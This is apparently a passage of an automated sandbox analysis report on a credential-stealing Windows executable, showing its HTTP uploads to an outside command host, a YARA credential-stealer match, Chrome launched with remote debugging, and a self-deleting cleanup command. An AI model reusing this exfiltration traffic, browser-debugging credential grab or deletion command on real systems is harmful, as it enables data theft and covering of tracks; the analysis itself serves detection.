                                                                                            2025-03-13 13:50:43 UTC16355OUTData Raw: 4b 4c 43 73 52 58 33 2f 41 43 44 35 50 39 35 61 71 36 5a 39 36 58 36 43 72 4e 36 66 2b 4a 66 4e 39 56 2f 6e 56 58 54 44 38 38 6e 30 46 58 48 34 47 42 70 59 6f 47 66 53 6a 4e 47 61 7a 45 4c 52 51 44 37 55 75 61 41 45 78 78 52 53 35 2b 74 47 52 53 41 4b 42 53 30 55 58 41 54 74 53 34 6f 4e 4c 53 43 34 6d 4b 4b 58 46 47 50 65 67 51 6d 4b 4d 55 6f 70 63 55 41 4e 78 53 30 75 4b 58 46 41 58 47 67 66 79 70 63 55 75 4b 4d 55 72 69 44 76 56 37 54 76 76 7a 59 2f 35 34 50 2f 41 43 71 6d 42 56 37 54 76 39 62 4a 78 2f 79 78 66 2b 56 5a 56 76 67 59 4a 36 6e 41 79 65 39 52 47 70 58 78 6d 6f 6a 30 72 33 49 62 49 36 34 69 48 6d 6d 6e 70 53 39 61 51 31 5a 61 47 6d 6d 6e 31 2f 6c 54 6a 31 35 36 55 30 2f 67 61 47 55 68 75 41 54 54 53 61 55 6e 46 4e 50 4e 53 79 30 4a 6e 50 61
                                                                                            Data Ascii: KLCsRX3/ACD5P95aq6Z96X6CrN6f+JfN9V/nVXTD88n0FXH4GBpYoGfSjNGazELRQD7UuaAExxRS5+tGRSAKBS0UXATtS4oNLSC4mKKXFGPegQmKMUopcUANxS0uKXFAXGgfypcUuKMUriDvV7TvvzY/54P/ACqmBV7Tv9bJx/yxf+VZVvgYJ6nAye9RGpXxmoj0r3IbI64iHmmnpS9aQ1ZaGmmn1/lTj156U0/gaGUhuATTSaUnFNPNSy0JnPa
                                                                                            2025-03-13 13:50:43 UTC16355OUTData Raw: 49 35 2f 38 41 6a 30 75 50 2b 75 5a 2f 6d 4b 7a 39 4d 2f 34 2b 48 2f 33 4b 30 62 6a 2f 41 49 38 37 6a 2f 72 6e 2f 55 56 6e 61 5a 2f 78 38 50 38 41 37 6c 45 64 6d 42 70 30 64 36 57 6c 41 78 51 41 32 6a 32 70 31 4a 69 67 42 4b 4d 55 34 43 67 30 42 63 61 61 55 43 69 6c 6f 75 46 78 4b 4b 57 67 43 67 42 75 4f 4b 57 6c 78 78 52 69 69 34 58 45 78 53 34 34 70 63 55 75 4b 56 78 44 63 55 55 37 46 41 46 46 77 75 4e 78 53 30 37 47 4f 31 47 4b 56 77 75 49 42 56 71 77 48 2b 6b 2f 39 73 33 7a 2f 77 42 38 6d 71 2b 4b 74 57 51 2f 66 6e 2f 72 6d 2f 38 41 36 43 61 7a 71 66 43 79 57 7a 67 70 4f 76 58 76 55 52 50 72 78 6a 30 71 57 51 2f 4d 61 69 4a 72 30 75 69 4f 2b 4f 77 33 50 47 54 53 48 38 4b 55 39 61 51 35 39 4b 6b 74 44 54 30 70 50 70 53 39 36 51 30 6d 55 42 70 44 53 6b
                                                                                            Data Ascii: I5/8Aj0uP+uZ/mKz9M/4+H/3K0bj/AI87j/rn/UVnaZ/x8P8A7lEdmBp0d6WlAxQA2j2p1JigBKMU4Cg0BcaaUCilouFxKKWgCgBuOKWlxxRii4XExS44pcUuKVxDcUU7FAFFwuNxS07GO1GKVwuIBVqwH+k/9s3z/wB8mq+KtWQ/fn/rm/8A6CazqfCyWzgpOvXvURPrxj0qWQ/MaiJr0uiO+Ow3PGTSH8KU9aQ59KktDT0pPpS96Q0mUBpDSk
                                                                                            2025-03-13 13:50:43 UTC16355OUTData Raw: 2f 67 65 4b 58 56 74 58 6e 31 69 38 69 75 70 31 56 4a 59 34 68 48 6d 50 49 42 35 4a 7a 2b 74 63 38 64 58 74 70 59 72 75 53 4b 47 37 67 4d 4e 70 39 70 57 4f 65 52 58 33 41 4f 6f 62 35 67 69 35 2b 56 69 63 59 47 4e 70 36 35 34 66 4c 71 6c 72 61 53 54 47 34 38 39 31 74 6c 74 34 70 49 59 53 50 4d 6b 75 4a 6c 4c 72 47 76 79 6e 61 46 55 63 6e 42 35 47 4f 2f 41 38 54 68 59 7a 35 32 72 53 39 4e 64 53 6f 34 4c 48 7a 70 2b 7a 6a 4b 38 50 58 54 54 2f 4c 63 30 70 4a 35 70 74 76 6d 79 76 4a 74 34 58 63 78 4f 50 70 55 64 51 77 7a 4a 4e 63 61 70 41 38 56 39 5a 58 55 44 57 30 56 74 62 58 69 42 57 61 53 52 58 4f 78 73 71 75 64 33 6c 34 55 67 44 6b 69 71 31 76 71 4d 64 77 6d 6c 73 6d 2f 64 65 51 53 53 75 72 44 37 70 57 56 30 77 4f 50 39 6a 76 57 6c 50 48 55 4a 53 55 49 76
                                                                                            Data Ascii: /geKXVtXn1i8iup1VJY4hHmPIB5Jz+tc8dXtpYruSKG7gMNp9pWOeRX3AOob5gi5+VicYGNp654fLqlraSTG4891tlt4pIYSPMkuJlLrGvynaFUcnB5GO/A8ThYz52rS9NdSo4LHzp+zjK8PXTT/Lc0pJ5ptvmyvJt4XcxOPpUdQwzJNcapA8V9ZXUDW0VtbXiBWaSRXOxsqud3l4UgDkiq1vqMdwmlsm/deQSSurD7pWV0wOP9jvWlPHUJSUIv
                                                                                            2025-03-13 13:50:43 UTC16355OUTData Raw: 76 7a 7a 69 56 2f 37 61 2f 52 48 36 4e 77 77 76 39 68 58 71 79 72 45 61 4c 2b 7a 47 6f 61 64 4e 61 37 39 6e 6d 41 59 62 30 49 49 49 2f 6c 53 52 64 71 74 78 31 38 35 53 71 53 70 7a 56 53 47 36 64 31 38 6a 36 47 72 54 6a 55 67 36 63 39 6d 72 50 35 6e 6c 64 46 41 4f 52 6b 55 56 2b 79 6e 34 77 46 48 65 69 6b 70 67 4c 56 4c 56 66 38 41 6b 47 7a 66 68 2f 4d 56 64 71 6c 71 76 2f 49 4e 6d 2f 44 2b 59 72 69 7a 48 2f 63 36 76 2b 47 58 35 4d 39 66 68 37 2f 6b 62 34 58 2f 41 4b 2b 51 2f 77 44 53 6b 65 35 33 34 75 6a 70 31 79 4c 46 6b 57 37 4d 62 65 53 58 2b 36 48 78 78 6e 38 61 35 66 77 35 34 52 6c 74 74 58 6c 31 72 56 79 4a 4c 30 6a 62 43 6a 53 47 55 6f 4f 37 4d 78 36 73 66 59 41 44 74 37 64 6a 58 6c 39 33 34 6b 38 53 44 2b 31 4a 4c 65 38 75 56 74 34 72 32 53 33 61
                                                                                            Data Ascii: vzziV/7a/RH6Nwwv9hXqyrEaL+zGoadNa79nmAYb0III/lSRdqtx185SqSpzVSG6d18j6GrTjUg6c9mrP5nldFAORkUV+yn4wFHeikpgLVLVf8AkGzfh/MVdqlqv/INm/D+YrizH/c6v+GX5M9fh7/kb4X/AK+Q/wDSke534ujp1yLFkW7MbeSX+6Hxxn8a5fw54RlttXl1rVyJL0jbCjSGUoO7Mx6sfYADt7djXl934k8SD+1JLe8uVt4r2S3a
                                                                                            2025-03-13 13:50:43 UTC192OUTData Raw: 7a 52 4f 48 6a 6b 6a 59 71 79 4d 44 6b 45 45 63 67 67 39 36 36 57 78 38 65 61 72 6c 34 4e 66 6c 6e 38 51 61 64 49 42 76 73 39 51 75 58 63 42 68 39 31 6b 59 6b 6c 47 42 37 6a 71 43 51 65 74 63 74 52 52 59 44 6f 4e 51 38 62 2b 4a 64 52 38 2b 4f 54 57 72 32 4b 31 6d 55 78 6d 7a 74 35 33 6a 74 31 6a 49 78 35 61 78 67 37 51 75 4f 4d 59 36 56 7a 39 46 46 4d 41 71 35 4a 2f 79 42 62 58 2f 41 4b 2b 4a 76 2f 51 59 36 70 31 63 6b 2f 35 41 74 72 2f 31 38 54 66 2b 67 78 30 41 66 2f 2f 5a 0d 0a 2d 2d 2d 2d 2d 2d 73 6a 77 74 30 68 6c 66 75 6b 36 38 79 75 6b 6e 37 67 64 32 2d 2d 0d 0a
                                                                                            Data Ascii: zROHjkjYqyMDkEEcgg966Wx8earl4Nfln8QadIBvs9QuXcBh91kYklGB7jqCQetctRRYDoNQ8b+JdR8+OTWr2K1mUxmzt53jt1jIx5axg7QuOMY6Vz9FFMAq5J/yBbX/AK+Jv/QY6p1ck/5Atr/18Tf+gx0Af//Z------sjwt0hlfuk68yukn7gd2--
                                                                                            2025-03-13 13:50:44 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:50:44 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            2025-03-13 13:50:44 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 2ok0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            26192.168.2.44977578.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:46 UTC271OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----i5x4ozu3euasrq16pzu3
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Content-Length: 331
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:50:46 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 69 35 78 34 6f 7a 75 33 65 75 61 73 72 71 31 36 70 7a 75 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 0d 0a 2d 2d 2d 2d 2d 2d 69 35 78 34 6f 7a 75 33 65 75 61 73 72 71 31 36 70 7a 75 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 69 35 78 34 6f 7a 75 33 65 75 61 73 72 71 31 36 70 7a 75 33 0d 0a 43 6f 6e 74
                                                                                            Data Ascii: ------i5x4ozu3euasrq16pzu3Content-Disposition: form-data; name="token"62ea7d46d032f863664b8276fed29d8f------i5x4ozu3euasrq16pzu3Content-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------i5x4ozu3euasrq16pzu3Cont
                                                                                            2025-03-13 13:50:47 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:50:46 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            2025-03-13 13:50:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            27192.168.2.44977678.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:48 UTC271OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----3ec2vaimy5phvaasjwt0
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Content-Length: 331
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:50:48 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 33 65 63 32 76 61 69 6d 79 35 70 68 76 61 61 73 6a 77 74 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 0d 0a 2d 2d 2d 2d 2d 2d 33 65 63 32 76 61 69 6d 79 35 70 68 76 61 61 73 6a 77 74 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 33 65 63 32 76 61 69 6d 79 35 70 68 76 61 61 73 6a 77 74 30 0d 0a 43 6f 6e 74
                                                                                            Data Ascii: ------3ec2vaimy5phvaasjwt0Content-Disposition: form-data; name="token"62ea7d46d032f863664b8276fed29d8f------3ec2vaimy5phvaasjwt0Content-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------3ec2vaimy5phvaasjwt0Cont
                                                                                            2025-03-13 13:50:49 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:50:49 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            2025-03-13 13:50:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:09:49:43
                                                                                            Start date:13/03/2025
                                                                                            Path:C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\ngbtiladkrthgad.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:140'800 bytes
                                                                                            MD5 hash:20BEEEADD1CFAC0BB5BDA17172F1359F
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:8
                                                                                            Start time:09:50:06
                                                                                            Start date:13/03/2025
                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                            Imagebase:0x7ff786830000
                                                                                            File size:3'388'000 bytes
                                                                                            MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:9
                                                                                            Start time:09:50:06
                                                                                            Start date:13/03/2025
                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1892,i,7460351053640162327,6554442286005526848,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2444 /prefetch:3
                                                                                            Imagebase:0x7ff786830000
                                                                                            File size:3'388'000 bytes
                                                                                            MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:10
                                                                                            Start time:09:50:48
                                                                                            Start date:13/03/2025
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\o89zu" & exit
                                                                                            Imagebase:0xc70000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:11
                                                                                            Start time:09:50:48
                                                                                            Start date:13/03/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff62fc20000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:12
                                                                                            Start time:09:50:48
                                                                                            Start date:13/03/2025
                                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:timeout /t 11
                                                                                            Imagebase:0x7ff6ca680000
                                                                                            File size:25'088 bytes
                                                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Disassembly

                                                                                            Reset < >